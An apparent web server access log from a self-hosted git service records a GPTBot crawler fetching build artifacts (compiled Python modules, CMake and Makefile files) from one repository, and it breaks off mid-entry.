"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:15:02:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 9965] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:15:02:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 9951] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:15:02:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 32204] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:15:02:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 21837] [Gzip 12.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:15:02:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 9937] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:15:02:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 16404] [Gzip 12.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:15:02:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 8040] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:15:02:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 14337] [Gzip 8.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:15:02:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 9972] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:15:02:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 9963] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:15:02:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 11520] [Gzip 4.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:15:02:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 777] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:15:02:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 4858] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:15:02:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10180] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:15:02:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 39744] [Gzip 13.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:15:02:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 234] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:15:02:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 53866] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:15:02:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 20387] [Gzip 16.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:15:02:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 8088] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:15:02:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 9945] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:15:02:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 9947] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:02:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 9950] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:15:02:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:15:02:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc" [Client 74.7.227.38] [Length 10935] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs" +[17/Feb/2026:15:02:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 9964] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:15:02:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 4092] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:15:02:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14308] [Gzip 8.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:15:02:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10025] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:15:02:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 10945] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs" +[17/Feb/2026:15:02:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/base_library.zip" [Client 74.7.227.38] [Length 9910] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/base_library.zip" +[17/Feb/2026:15:02:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/Analysis-00.toc" [Client 74.7.227.38] [Length 9884] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/Analysis-00.toc" +[17/Feb/2026:15:02:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs" [Client 74.7.227.38] [Length 9928] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs" +[17/Feb/2026:15:02:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PYZ-00.toc" [Client 74.7.227.38] [Length 77831] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PYZ-00.toc" +[17/Feb/2026:15:02:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/base_library.zip" [Client 74.7.227.38] [Length 2815266] [Gzip 25.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/base_library.zip" +[17/Feb/2026:15:02:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc" [Client 74.7.227.38] [Length 9928] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc" +[17/Feb/2026:15:02:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc" [Client 74.7.227.38] [Length 305] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc" +[17/Feb/2026:15:02:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc" [Client 74.7.227.38] [Length 11072] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc" +[17/Feb/2026:15:02:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PYZ-00.toc" [Client 74.7.227.38] [Length 9911] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PYZ-00.toc" +[17/Feb/2026:15:02:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 5210] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/Makefile" +[17/Feb/2026:15:02:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 9937] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:15:02:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 24016] [Gzip 15.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:15:02:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 6151] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:15:02:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 9941] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:02:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/base_library.zip" [Client 74.7.227.38] [Length 1332005] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/base_library.zip" +[17/Feb/2026:15:02:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 9928] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/Makefile" +[17/Feb/2026:15:02:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PYZ-00.toc" [Client 74.7.227.38] [Length 53153] [Gzip 27.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PYZ-00.toc" +[17/Feb/2026:15:02:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/Analysis-00.toc" [Client 74.7.227.38] [Length 80608] [Gzip 29.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 